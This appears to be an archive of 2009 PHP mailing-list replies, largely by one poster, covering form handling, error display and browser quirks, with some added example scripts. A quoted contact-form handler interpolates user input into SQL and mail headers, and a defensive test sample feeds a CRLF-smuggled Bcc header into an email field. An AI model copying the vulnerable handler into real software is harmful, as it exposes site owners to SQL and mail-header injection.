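$dir = sys_get_temp_dir() . '/headers_scan_' . uniqid();
mkdir($dir);
$samples = [
    'clean.php' => '<?php header("X-Test: 1");' . "\n",
    'bom.php'   => "\xEF\xBB\xBF" . '<?php header("X-Test: 1");' . "\n",
    'tail.php'  => '<?php $x = 1; ?' . '>' . "\n\n",
];
foreach ($samples as $name => $body) {
    file_put_contents("$dir/$name", $body);
}

foreach (scan_tree($dir) as $path => $reasons) {
    echo basename($path), ': ', implode(', ', $reasons), "\n";
}

// Remove the constructed files again.
foreach (array_keys($samples) as $name) {
    unlink("$dir/$name");
}
rmdir($dir);
```

At run time, headers_sent($file, $line) fills in the file and line where output started, which confirms a finding from the scan.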
[PHP] Error on .htaccess
In all the servers i had tested my system i don't have any problem, but in this server the apache are displaying to me the error 500 "Internal Server Error".

Someone can say to me what is wrong with my .htaccess?

RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond $1 !-d
RewriteRule ^(.*)$ load.php?$1 [QSA,L]

This server are running PHP 5.2.9 and Apache 1.3.41 (Unix).

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com
Re: [PHP] W3C Validator and Post Arrays
Put [] in the name attribute, but in ID must be unique.

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Thu, Apr 2, 2009 at 8:11 AM, Peter Ford wrote:

> Peter Ford wrote:
> > Michael A. Peters wrote:
> >> Shaun Thornburgh wrote:
> >>> Hi,
> >>>
> >>> We are getting errors when trying to validate our HTML due to the [
> >>> character when using Post Arrays:
> >>>
> >>> Line 173, Column 65:
> >>> character "[" is not allowed in the value of attribute "id"
> >>>
> >>> …e="filters[calling_url]" id="filters[calling_url]"
> >>> value="categories-bulk-ear
> >>>
> >>> Does anyone know of a way around this?
> >>>
> >>> Thanks
> >> Don't use [] in an ID - it doesn't belong there.
> >> If you are not using the ID for a hook, just drop it - the ID doesn't
> >> need to be there.
> >>
> >> The name attribute is where you want the [] to post an array, ID does
> >> not get sent in a post.
> >
> > The ID of any element should be unique in a HTML document - if you need an ID
> > for each of the inputs then you'll have to generate a unique one for each.
> >
> > To the rest of the list: I'm not too happy about having stuff inside the []
> > either - is that some syntax I've missed or is it just wrong?
>
> Oooh, I've just looked it up - that *is* neat!
>
> --
> Peter Ford phone: 01580 89
> Developer fax: 01580 893399
> Justcroft International Ltd., Staplehurst, Kent
Re: [PHP] Oracle's dump to MySQL
Am I on the Oracle/MySQL e-mail list?

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Thu, Apr 2, 2009 at 6:26 AM, 9el wrote:
> I found this command from one guy for importing Oracle's dump to MySQL
>
> Shell> mysql -uroot db_name -vvf < oracle_dump.dmp
>
> But, v is for verbose and f is for force continuation.
>
> Anyone worked with Oracle and MySQL?
Re: [PHP] XML data extraction
@Jessen I read your answer and... Do you have any article about what you are saying?

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Thu, Apr 2, 2009 at 8:38 AM, Per Jessen wrote:
> Andrew Williams wrote:
>
> > Best All,
> >
> > How can you best and accurately extract XML data to DB table. e.g.:
> >
>
> Use XSLT to generate SQL INSERT statements.
>
>
> /Per
>
> --
> Per Jessen, Zürich (11.3°C)
Re: [PHP] Button id's - firefox and IE different ?
If you don't want to change your form, write a function in JavaScript which controls the last button you clicked.

Delete
Delete
Delete

I want to give you some advice: learn more about HTML and Web Standards... Don't use the button type... use the "input" type...

Your JavaScript (using jQuery) looks like this:

$("input[name='btid']").click(function() {
    $('#last_buttom').attr('value', $(this).val());
});

And then you submit your form or something, and the input "last_buttom" has the value of the button you clicked last.

Regards,
Igor Escobar
systems analyst & interface designer
www . igorescobar . com

On Thu, Apr 2, 2009 at 8:29 AM, Phpster wrote:
> What about styling a link to look like a button with css? It won't be an
> exact match style wise but you can get close. I have done this successfully
>
> Bastien
>
> Sent from my iPod
>
>
> On Apr 2, 2009, at 6:04, "Angus Mann" wrote:
>
>> Hi all.
>>
>> I want to have several delete buttons with just one form, and depending on
>> which button is pressed, one of several items is deleted.
>>
>> So I need multiple submit buttons for 1 form, each displaying the same
>> text "Delete" to the user, but each with a different "value" so the PHP
>> script can tell them apart.
>>
>> I've used this code for the buttons...
>> Delete
>> Delete
>> Delete
>>
>> And it works just fine with firefox. But IE does not seem to pass the
>> value back to the btid so when the script asks
>> if $_POST['btid'] == "1" {
>> }
>>
>> the value 1, 2, or 3 is not given back to PHP by IE. It is given back
>> correctly by firefox and works fine.
>>
>> Any suggestions ?
>>
>> Thanks.
Re: [PHP] Button id's - firefox and IE different ?
I'm sorry, you are the master o/

ps: I'm not asking him to install jQuery, I just gave an example of how he can do something like that.
ps 2: I know the difference between XHTML and HTML; I put the "/" there because it's force of habit.
ps 3: Why is JavaScript bad? You don't know how to develop a good interface with it? Shame on you.
ps 4: Who do you think you are? Everybody is here to pass something on to the others and learn something. Everything I wrote is just to help. If you are competing with others to show how much bigger you are, go to a championship or something.

Have a nice day.

Regards,
Igor Escoar
Systems Analyst & Interface Designer

--

Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar

On Thu, Apr 2, 2009 at 11:01 AM, Jan G.B. wrote:
> 2009/4/2 Igor Escobar :
> > If you don't want to change your form, write a function in JavaScript which
> > controls the last button you clicked.
> >
>
> Javascript is bad and you don't need it.
>
> >> Delete
> >> Delete
> >> Delete
> >
> >
> >
> > I want to give you some advice: learn more about HTML and Web Standards...
>
> I want to give an advice to you: learn to make a difference out of HTML
> and XHTML. It's not the same, and is XHTML.
>
> > Don't use the button type... use the "input" type...
> >
>
> You forgot to mention *why* he should use !
>
> is supported by all major browsers! So there's no need to use
> instead ...
>
> But having several or tags in one form element with
> the same NAME="" value makes no sense! Only the last one in the code
> will be submitted.
> Also, the LABEL for the button should be written like that: name="x1" value="0815">LABEL GOES HERE
>
> http://www.w3schools.com/tags/tag_button.asp
>
>
> Using might be more future-oriented.. ;)
>
>
>
> > Your JavaScript (using jQuery) looks like this:
> >
>
> Installing and using "jquery" to have three buttons is overkill. not
> more, not less!
>
>
> byebye
>
> > $("input[name='btid']").click(function() {
> >     $('#last_buttom').attr('value', $(this).val());
> > });
> >
> > And then you submit your form or something, and the input "last_buttom" has
> > the value of the button you clicked last.
> >
> > Regards,
> > Igor Escobar
> > systems analyst & interface designer
> > www . igorescobar . com
> >
> >
> >
> > On Thu, Apr 2, 2009 at 8:29 AM, Phpster wrote:
> >
> >> What about styling a link to look like a button with css? It won't be an
> >> exact match style wise but you can get close. I have done this successfully
> >>
> >> Bastien
> >>
> >> Sent from my iPod
> >>
> >>
> >> On Apr 2, 2009, at 6:04, "Angus Mann" wrote:
> >>
> >>> Hi all.
> >>>
> >>> I want to have several delete buttons with just one form, and depending on
> >>> which button is pressed, one of several items is deleted.
> >>>
> >>> So I need multiple submit buttons for 1 form, each displaying the same
> >>> text "Delete" to the user, but each with a different "value" so the PHP
> >>> script can tell them apart.
> >>>
> >>> I've used this code for the buttons...
> >>> Delete
> >>> Delete
> >>> Delete
> >>>
> >>> And it works just fine with firefox. But IE does not seem to pass the
> >>> value back to the btid so when the script asks
> >>> if $_POST['btid'] == "1" {
> >>> }
> >>>
> >>> the value 1, 2, or 3 is not given back to PHP by IE. It is given back
> >>> correctly by firefox and works fine.
> >>>
> >>> Any suggestions ?
> >>>
> >>> Thanks.
Re: [PHP] Button id's - firefox and IE different ?
If you read my email you can see that i just give a "solution" to him and not a TIP. "IF you DONT want change your form" But if i were doing, i be doing by the right way...can be sure that. Regards, Igor Escoar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Fri, Apr 3, 2009 at 6:27 AM, Jan G.B. wrote: > Igor, > what are you doing here? You say I'm arguing to show how big I am, but > that's not true. I corrected your misleading tipps like using JSCRIPT > to have form essentials and using xhtml in an html context. > no reason to get personal and/or offending. > > bye. > > > 2009/4/2 Igor Escobar : > > I'm sorry, you is the master o/ > > > shame on you. > > > Who you think you is? everybody is here to pass something for the > > others and learn something, everything i wrote its just to help, if you > are > > compete with others showing how much bigger you is, go to a championship > or > > something. > > > > Have a nice day. > > > > Regards, > > Igor Escoar > > Systems Analyst & Interface Designer > > > > -- > > > > Personal Blog > > ~ blog.igorescobar.com > > Online Portifolio > > ~ www.igorescobar.com > > Twitter > > ~ @igorescobar > > > > > > > > > > > > On Thu, Apr 2, 2009 at 11:01 AM, Jan G.B. > wrote: > >> > >> 2009/4/2 Igor Escobar : > >> > If you don't want change your form, do some function in Javascript > witch > >> > control the last button you clicked. > >> > > >> > >> Javascript is bad and you don't need it. > >> > >> >> Delete > >> >> Delete > >> >> Delete > >> > > >> > > >> > > >> > I wanna make a advice to you learn more about HTML and Web > Standards... > >> > >> I want give an advice to you: learn to make a difference out of HTML > >> and XHTML. It's not the same, and is XHTML. > >> > >> > Don't use button type... use "input" type... > >> > > >> > >> You forgot to mention *why* he should he use ! > >> > >> is supported by all major browsers! 
So there's no need to use > >> instead ... > >> > >> But having several or tags in one form element with > >> the same NAME="" value makes no sense! Only the last one in the code > >> will be submitted. > >> Also, the LABEL for the button should be written like that: >> name="x1" value="0815">LABEL GOES HERE > >> > >> http://www.w3schools.com/tags/tag_button.asp > >> > >> > >> Using might be more future-oriented.. ;) > >> > >> > >> > >> > Your javascript (using jQuery) sems like this > >> > > >> > >> Installing and using "jquery" to have three buttons is overkill. not > >> more, not less! > >> > >> > >> byebye > >> > >> > $("input[name='btid']").click(function() { > >> > $('#last_buttom').attr('value', $(this).val()); > >> > }); > >> > > >> > And then you submit your form or something, the input "last_buttom" > are > >> > with > >> > the value of the buttom you has clicked at last time. > >> > > >> > Regards, > >> > Igor Escobar > >> > systems analyst & interface designer > >> > www . igorescobar . com > >> > > >> > > >> > > >> > On Thu, Apr 2, 2009 at 8:29 AM, Phpster wrote: > >> > > >> >> What about styling a link to look like a button with css? It won't be > >> >> an > >> >> exact match style wise but you can get close. I have done this > >> >> succesfully > >> >> > >> >> Bastien > >> >> > >> >> Sent from my iPod > >> >> > >> >> > >> >> On Apr 2, 2009, at 6:04, "Angus Mann" wrote: > >> >> > >> >> Hi all. > >> >>> > >> >>> I want to have several delete buttons with just one form, and > >> >>> depending on > >> >>> which button is pressed, one of several items is deleted. > >> >>> > >> >>> So I need multiple submit buttons for 1 form, each displaying the > same > >> >>> text "Delete" to the user, but each with a different "value" so the > >> >>> PHP > >> >>> script can tell them apart. > >> >>> > >> >>> I've used this code for the buttons... > >> >>> Delete > >> >>> Delete > >> >>> Delete > >> >>> > >> >>> And it works just fine with firefox. 
But IE does not seem to pass > the > >> >>> value back to the btid so when the script asks > >> >>> if $_POST['btid'] == "1" { > >> >>> } > >> >>> > >> >>> the value 1, 2, or 3 is not given back to PHP by IE. It is given > back > >> >>> correctly by firefox and works fine. > >> >>> > >> >>> Any suggestions ? > >> >>> > >> >>> Thanks. > >> >>> > >> >>> > >> >> -- > >> >> PHP General Mailing List (http://www.php.net/) > >> >> To unsubscribe, visit: http://www.php.net/unsub.php > >> >> > >> >> > >> > > > > > >
Re: [PHP] Button id's - firefox and IE different ?
Better then READ is UNDERSTAND. Regards, Igor Escoar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Fri, Apr 3, 2009 at 11:30 AM, Jan G.B. wrote: > http://www.stimpco.com/carpix/arguingOnTheInternet.gif > > byebye > > 2009/4/3 Igor Escobar : > > If you read my email you can see that i just give a "solution" to him and > > not a TIP. > > > > "IF you DONT want change your form" > > > > But if i were doing, i be doing by the right way...can be sure that. > > > > > > Regards, > > Igor Escoar > > Systems Analyst & Interface Designer > > > > -- > > > > Personal Blog > > ~ blog.igorescobar.com > > Online Portifolio > > ~ www.igorescobar.com > > Twitter > > ~ @igorescobar > > > > > > > > > > > > On Fri, Apr 3, 2009 at 6:27 AM, Jan G.B. > wrote: > >> > >> Igor, > >> what are you doing here? You say I'm arguing to show how big I am, but > >> that's not true. I corrected your misleading tipps like using JSCRIPT > >> to have form essentials and using xhtml in an html context. > >> no reason to get personal and/or offending. > >> > >> bye. > >> > >> > >> 2009/4/2 Igor Escobar : > >> > I'm sorry, you is the master o/ > >> > >> > shame on you. > >> > >> > Who you think you is? everybody is here to pass something for the > >> > others and learn something, everything i wrote its just to help, if > you > >> > are > >> > compete with others showing how much bigger you is, go to a > championship > >> > or > >> > something. > >> > > >> > Have a nice day. > >> > > >> > Regards, > >> > Igor Escoar > >> > Systems Analyst & Interface Designer > >> > > >> > -- > >> > > >> > Personal Blog > >> > ~ blog.igorescobar.com > >> > Online Portifolio > >> > ~ www.igorescobar.com > >> > Twitter > >> > ~ @igorescobar > >> > > >> > > >> > > >> > > >> > > >> > On Thu, Apr 2, 2009 at 11:01 AM, Jan G.B. 
> >> > wrote: > >> >> > >> >> 2009/4/2 Igor Escobar : > >> >> > If you don't want change your form, do some function in Javascript > >> >> > witch > >> >> > control the last button you clicked. > >> >> > > >> >> > >> >> Javascript is bad and you don't need it. > >> >> > >> >> >> value="1">Delete > >> >> >> value="2">Delete > >> >> >> value="3">Delete > >> >> > > >> >> > /> > >> >> > > >> >> > I wanna make a advice to you learn more about HTML and Web > >> >> > Standards... > >> >> > >> >> I want give an advice to you: learn to make a difference out of HTML > >> >> and XHTML. It's not the same, and is XHTML. > >> >> > >> >> > Don't use button type... use "input" type... > >> >> > > >> >> > >> >> You forgot to mention *why* he should he use ! > >> >> > >> >> is supported by all major browsers! So there's no need to > use > >> >> instead ... > >> >> > >> >> But having several or tags in one form element with > >> >> the same NAME="" value makes no sense! Only the last one in the code > >> >> will be submitted. > >> >> Also, the LABEL for the button should be written like that: >> >> name="x1" value="0815">LABEL GOES HERE > >> >> > >> >> http://www.w3schools.com/tags/tag_button.asp > >> >> > >> >> > >> >> Using might be more future-oriented.. ;) > >> >> > >> >> > >> >> > >> >> > Your javascript (using jQuery) sems like this > >> >> > > >> >> > >> >> Installing and using "jquery" to have three buttons is overkill. not > >> >> more, not less! > >> >> > &g
Re: [PHP] Button id's - firefox and IE different ?
ZZzz. What what? Oh sorry, I fell asleep. Whatever, end of discussion.

Regards,
Igor Escoar
Systems Analyst & Interface Designer

--

Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar

On Fri, Apr 3, 2009 at 11:40 AM, Jan G.B. wrote:
> Is it mandatory to annoy the whole list with your crap?
> If you want to keep on informing me or insulting me or feel free to
> send it directly to me. I'll add you to my killfile in no time.
> get a life
>
> 2009/4/3 Igor Escobar :
> > Better then READ is UNDERSTAND.
> >
>
> >> >> >> 2009/4/2 Igor Escobar :
> >> >> >> > If you don't want change your form, do some function in Javascript
> >> >> >> > witch
> >> >> >> > control the last button you clicked.
>
>
> > Regards,
> > Igor Escoar
> > Systems Analyst & Interface Designer
> >
Re: [PHP] What is wrong with this code
You forgot to mention the "method" of the form. ...

Regards,
Igor Escoar
Systems Analyst & Interface Designer

--

Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar

On Fri, Apr 3, 2009 at 4:08 PM, Gary wrote:
> This is driving me nuts. I am getting blank emails and the only information
> that is being passed to MySQL is the IP address.
>
> Can someone tell me what is wrong with this?
>
>
>
> If you can see this, it's an anti-spam measure. Please don't
> fill in the address field.
> Address
>
>
> Name:
>
> Email Address:
>
>
> Comments:
>
>
>
>
> // Receiving variables
>
>
> $ip= $_SERVER['REMOTE_ADDR'];
> $name = $_POST['name'];
> $email = $_POST['email'];
> $comments = $_POST['comments'];
>
> //spam filter, do not touch
> if ($_POST['address'] != '' ){
>
>
> die("Changed field");
>
> }
>
> //end of spam filter
>
> $header = "From: $email\n"
> . "Reply-To: $email\n";
> $subject = "Response from Assessment Lawyer";
> $email_to = "sanitized";
> $message = "name: $name\n"
> . "email: $email\n"
> . "comments: $comments\n"
> ."Visitors IP: $ip\n";
> mail($email_to, $subject, $message, $header);
>
>
>
>
> $dbc= mysqli_connect(sanitized,sanitized,sanitized,sanitized)// I have
> removed the actual information, but it was connecting!
> or die('Could not connect to db');
>
> $query = "INSERT INTO sanitized VALUES(0,'$name',
> '$email','$comments','$ip')";
>
> $result = mysqli_query($dbc, $query)
> or die('Error querying database.');
>
>
>
> mysqli_close($dbc);
>
> echo 'Thank you $name for submitting your inquiry!';
> echo 'You have supplied the following information:';
> echo 'Name: $name ';
> echo 'Email Address: $email ';
> echo 'Comments: $comments';
>
> ?>
Re: [PHP] What is wrong with this code
If method POST is there and the information still empty...maybe you should call to someone like a warlock... :D Regards, Igor Escoar Systems Analyst & Interface Designer -- Personal Blog ~ blog.igorescobar.com Online Portifolio ~ www.igorescobar.com Twitter ~ @igorescobar On Fri, Apr 3, 2009 at 4:22 PM, Gary wrote: > I recieve an email, it will contain the ip address, it will also contain > the > name:, email: , comments: but not the information from the form of the > name or email or comments. > > The database also recieves only the ip address. So I assume those parts > are > working, but I cant seem to find why the others are not. > > Thanks for your reply. > > Gary > > ""kyle.smith"" wrote in message > news:d3fe56d174abf6469079ca1a5c8474a804fa9...@nsmail01.inforonics.corp... > Try something like print_r on $_POST to see if it contains *anything*, > seems like it's empty?! > > Also, when you say blank emails I assume you mean they have the template > you made but the variables are empty and not zero-length emails. > > -Original Message- > From: Gary [mailto:gwp...@ptd.net] > Sent: Friday, April 03, 2009 3:14 PM > To: php-general@lists.php.net > Subject: Re: [PHP] What is wrong with this code > > Its there... > > > "Igor Escobar" wrote in message > news:1f5251d50904031212o6fcc3e43q5c60b7ae373e9...@mail.gmail.com... > > You forgot to mention the "method" of the form. > > > > ... > > > > Regards, > > Igor Escoar > > Systems Analyst & Interface Designer > > > > -- > > > > Personal Blog > > ~ blog.igorescobar.com > > Online Portifolio > > ~ www.igorescobar.com > > Twitter > > ~ @igorescobar > > > > > > > > > > > > On Fri, Apr 3, 2009 at 4:08 PM, Gary wrote: > > > >> This is driving me nuts. I am getting blank emails and the only > >> information that is being passed to MySQL is the IP address. > >> > >> Can someone tell me what is wrong with this? > >> > >> > >> > >> If you can see this, it's an anti-spam measure. Please don't > >> fill in the address field. 
> >> Address > >> > >> > >> Name: > >> > >> Email Address: >> type="text" /> Comments: >> name="comments" cols="50" rows=""> >> type="button" value="submit" /> > >> > >> >> > >> // Receiving variables > >> > >> > >> $ip= $_SERVER['REMOTE_ADDR']; > >> $name = $_POST['name']; > >> $email = $_POST['email']; > >> $comments = $_POST['comments']; > >> > >> //spam filter, do not touch > >> if ($_POST['address'] != '' ){ > >> > >> > >> die("Changed field"); > >> > >>} > >> > >> //endo fo spam filter > >> > >> $header = "From: $email\n" > >> . "Reply-To: $email\n"; > >> $subject = "Response from Assessment Lawyer"; $email_to = > >> "sanitized"; $message = "name: $name\n" > >> . "email: $email\n" > >> . "comments: $comments\n" > >> ."Visitors IP: $ip\n"; > >> mail($email_to, $subject, $message, $header); > >> > >> > >> > >> > >> $dbc= mysqli_connect(sanitized,sanitized,sanitized,sanitized)// I > >> have removed the actual information, but it was connecting! > >> or die('Could not connect to db'); > >> > >> $query = "INSERT INTO sanitized VALUES(0,'$name', > >> '$email','$comments','$ip')"; > >> > >> $result = mysqli_query($dbc, $query) > >> or die('Error querying database.'); > >> > >> > >> > >>mysqli_close($dbc); > >> > >> echo 'Thank you $name for submitting your inquiry!'; echo 'You > >> have supplied the following information:'; echo 'Name: $name > >> '; echo 'Email Address: $email '; echo 'Comments: > >> $comments'; > >> > >> ?> > >> > >> > >> > >> -- > >> PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: > > >> http://www.php.net/unsub.php > >> > >> > > > > > > -- > PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: > http://www.php.net/unsub.php > > > > -- > PHP General Mailing List (http://www.php.net/) > To unsubscribe, visit: http://www.php.net/unsub.php > >
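The handler quoted in this thread places the $_POST values directly into the mail headers, the SQL string and the page output. A hardened version of the same flow follows as an added example; it is not code from the thread, it assumes PHP 7.2 or later, and the table and column names, the two addresses and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed placeholders: the thread's real addresses and table were sanitized.
const SITE_FROM = 'webform@example.com';
const SITE_TO   = 'office@example.com';

// Returns [fields, errors]; use the fields only when errors is empty.
function validate_inquiry(array $post): array
{
    $errors = [];
    // Non-string input (for example name[]=x) is treated as empty.
    $field = static function (string $key) use ($post): string {
        return is_string($post[$key] ?? null) ? trim($post[$key]) : '';
    };
    // Honeypot from the original form: a human leaves "address" empty.
    if ($field('address') !== '') {
        $errors[] = 'address';
    }
    $name     = $field('name');
    $email    = $field('email');
    $comments = $field('comments');

    // CR or LF in a value that reaches a mail header would start a new header.
    if ($name === '' || strlen($name) > 100 || preg_match('/[\r\n]/', $name)) {
        $errors[] = 'name';
    }
    if (preg_match('/[\r\n]/', $email) || filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'email';
    }
    if ($comments === '' || strlen($comments) > 5000) {
        $errors[] = 'comments';
    }
    return [['name' => $name, 'email' => $email, 'comments' => $comments], $errors];
}

function send_inquiry_mail(array $f, string $ip): bool
{
    $headers = [
        'From'     => SITE_FROM,    // fixed sender, never the visitor's input
        'Reply-To' => $f['email'],  // validated above
    ];
    $body = "name: {$f['name']}\nemail: {$f['email']}\n"
          . "comments: {$f['comments']}\nVisitor's IP: $ip\n";
    return mail(SITE_TO, 'Response from Assessment Lawyer', $body, $headers);
}

function save_inquiry(mysqli $dbc, array $f, string $ip): bool
{
    // Placeholders keep the data out of the SQL text entirely.
    $stmt = $dbc->prepare(
        'INSERT INTO inquiries (name, email, comments, ip) VALUES (?, ?, ?, ?)'
    );
    if ($stmt === false) {
        return false;
    }
    $stmt->bind_param('ssss', $f['name'], $f['email'], $f['comments'], $ip);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function render_confirmation(array $f): string
{
    return '<p>Thank you ' . h($f['name']) . ' for submitting your inquiry!</p>'
         . '<p>Email Address: ' . h($f['email']) . '</p>'
         . '<p>Comments: ' . nl2br(h($f['comments'])) . '</p>';
}

// Constructed inputs. In the real handler, an empty error list is followed by
// send_inquiry_mail() and save_inquiry(); those need a mail setup and a
// database connection, so this offline run only validates and renders.
$samples = [
    'ordinary' => ['name' => 'Ann Example', 'email' => 'ann@example.com',
                   'comments' => 'Please call <b>me</b>', 'address' => ''],
    'line break in email' => ['name' => 'Ann', 'email' => "ann@example.com\r\nBcc: list@example.net",
                   'comments' => 'hi', 'address' => ''],
    'honeypot filled' => ['name' => 'Bot', 'email' => 'bot@example.com',
                   'comments' => 'hi', 'address' => '1 Main St'],
];
foreach ($samples as $label => $post) {
    [$fields, $errors] = validate_inquiry($post);
    echo $label, ': ',
         $errors ? 'rejected (' . implode(', ', $errors) . ')' : render_confirmation($fields),
         "\n";
}
```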
Re: [PHP] Best Practices for Hiding Errors
Be careful, error suppression is slow.

Regards,
Igor Escoar
Systems Analyst & Interface Designer

--

Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar

On Mon, Apr 6, 2009 at 8:38 PM, Chris wrote:
>
>> but they give the following warning:
>>
>> "This is a feature to support your development and should never be used on
>> production systems (e.g. systems connected to the internet)."
>>
>> Am unclear what that means - is it okay to add:
>>
>
> It's about "information disclosure".
>
> Errors/warnings/notices contain paths to php files when they are printed
> out.
>
> $ cat test.php
> <?php
> ini_set('display_errors', true);
> error_reporting(E_ALL);
> echo 'a is ' . $a . "\n";
>
> $ php test.php
>
> Notice: Undefined variable: a in /path/to/test.php on line 4
>
> You don't want that because now a potential attacker knows some info - it's
> a unix type system (a windows path is drive:\blah\folder so looks different)
> and the files are located in /path/to/.
>
> If that message contains database info or passwords for example, you could
> be in trouble.
>
>> ini_set('display_errors','Off');
>>
>> to my page, so that an end user won't ever get the warning displayed and I
>> can deal with the error behind the scenes? Or is there a better way to keep
>> PHP from writing error codes to the screen?
>>
>
> That's exactly the right thing to change - but only for production systems.
> You should develop with this ON so you can see when you have a problem that
> needs to be addressed. Some situations (as above) will cause a problem as
> you've seen but most won't.
>
> You can also use the @ symbol before the function name - but make sure you
> don't use it everywhere (it'll make debugging extremely hard - you could
> spend hours looking for a problem and it ends up being a database connection
> problem) & also comment your code about why you're doing it:
>
> # use the @ here because php throws a warning if it can't be opened.
> $fp = @fsockopen('blah');
>
> --
> Postgresql & php tutorials
> http://www.designmagick.com/
Re: [PHP] Best Practices for Hiding Errors
It's just an observation ;) Whether you have to use it or not, you have to decide the better way.

Regards,
Igor Escoar
Systems Analyst & Interface Designer

--

Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar

On Mon, Apr 6, 2009 at 9:56 PM, Chris wrote:
> Igor Escobar wrote:
>
>> Becarefull, error supression is slow.
>>
>
> If it's the only way to stop an error from showing up, what's the problem?
>
> php will still generate the warning/notice even if display_errors is
> disabled - which will be even slower.
>
> Plus I never said use it everywhere, I said use it in particular cases and
> comment your code about why you had to use it.
>
>
> --
> Postgresql & php tutorials
> http://www.designmagick.com/
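One way to "deal with the error behind the scenes" as discussed in this thread: keep generating every error, write the details (including file paths) to a log only, and show the visitor a generic message with a reference id. This is an added example, not code from the thread; it assumes PHP 7 or later, and the APP_ENV variable, the log location and the function names are assumptions.

```php
<?php
declare(strict_types=1);

// Assumed for illustration: an APP_ENV environment variable and this log path.
$production = getenv('APP_ENV') !== 'development';
$logFile    = sys_get_temp_dir() . '/app-errors.log';

error_reporting(E_ALL);                               // keep generating every error
ini_set('display_errors', $production ? '0' : '1');   // never print them in production
ini_set('log_errors', '1');                           // always record them
ini_set('error_log', $logFile);

// Convert warnings and notices into exceptions so callers handle them
// explicitly instead of hiding them with @.
set_error_handler(function (int $severity, string $message, string $file, int $line): bool {
    if (!(error_reporting() & $severity)) {
        return false;                                 // masked (for example by @)
    }
    throw new ErrorException($message, 0, $severity, $file, $line);
});

// Log the full detail under a random reference and return text that is safe
// to show: no path, no SQL, no credentials.
function report_privately(Throwable $e): string
{
    $ref = bin2hex(random_bytes(4));
    error_log(sprintf(
        '[ref %s] %s: %s in %s:%d',
        $ref, get_class($e), $e->getMessage(), $e->getFile(), $e->getLine()
    ));
    return "Sorry, something went wrong (reference $ref).";
}

// Last line of defence for anything nobody caught.
set_exception_handler(function (Throwable $e): void {
    if (PHP_SAPI !== 'cli' && !headers_sent()) {
        http_response_code(500);
    }
    echo report_privately($e), "\n";
});

// Constructed demonstration: reading a missing file raises an E_WARNING whose
// text contains a filesystem path, like the notice quoted in the thread.
function load_settings(string $path): array
{
    try {
        $raw = file_get_contents($path);
    } catch (ErrorException $e) {
        echo report_privately($e), "\n";              // what the visitor sees
        return [];
    }
    return parse_ini_string($raw) ?: [];
}

load_settings(__DIR__ . '/does-not-exist.ini');
echo "Details were written to $logFile\n";
```

The reference id lets support staff find the matching log line without the path ever reaching the browser.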
Re: [PHP] redirect to a page the fist time a site is accessed
I agree with @stuart.

Regards,
Igor Escoar
Systems Analyst & Interface Designer

--

Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar

On Thu, Apr 16, 2009 at 6:05 AM, Stuart wrote:
> 2009/4/15 Don :
> > I have some code in my index.php file that check the user agent and
> > redirects to a warning page if IE 6 or less is encountered.
> >
> > 1. I'm using a framework and so calls to all pages go through index.php
> > 2. The code that checks for IE 6 or less and redirects is in index.php
> >
> > I know how to redirect the users but what I want to do is redirect a user
> > ONLY the first time the web site is accessed regardless of what page they
> > first access. I would like to minimize overhead (no database). Can this be
> > done?
>
> Why redirect? That sucks as a user experience. Why not simply put an
> alert somewhere prominent on the page with the message you want to
> convey? That way you can have it on every page and not interrupt the
> users use of your site.
>
> -Stuart
>
> --
> http://stut.net/
Re: [PHP] $_session/$_cookie trouble
http://www.tech-recipes.com/rx/1489/solve-php-error-cannot-modify-header-information-headers-already-sent/

Regards,
Igor Escobar
Systems Analyst & Interface Designer

--

Personal Blog
~ blog.igorescobar.com
Online Portifolio
~ www.igorescobar.com
Twitter
~ @igorescobar

On Tue, Apr 28, 2009 at 3:59 PM, Ashley Sheridan wrote:
> On Tue, 2009-04-28 at 10:48 -0400, Gary wrote:
> > I am trying to set a cookie and a session, but seem to be running into a
> > wall.
> >
> > I have tried different variations, and keep getting the same error message
> >
> > If I have this
> >
> >
> > session_start();
> >
> > I get this:
> > Warning: session_start() [function.session-start]: Cannot send session
> > cookie - headers already sent by (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > Warning: session_start() [function.session-start]: Cannot send session cache
> > limiter - headers already sent (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > If I have this:
> > session_start();
> >
> > setcookie('sale_cookie','$sale_value', time()-3600);
> > setcookie('assess_cookie','$assess_value', time()-3600);
> > I get this
> >
> >
> > Warning: session_start() [function.session-start]: Cannot send session
> > cookie - headers already sent by (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > Warning: session_start() [function.session-start]: Cannot send session cache
> > limiter - headers already sent (output started at
> > C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
> > C:\xampp\htdocs\weiss\assessresult.inc.php on line 4
> >
> > Warning: Cannot modify header information - headers already sent by (output
> > started at C:\xampp\htdocs\weiss\assessresult.inc.php:2) in
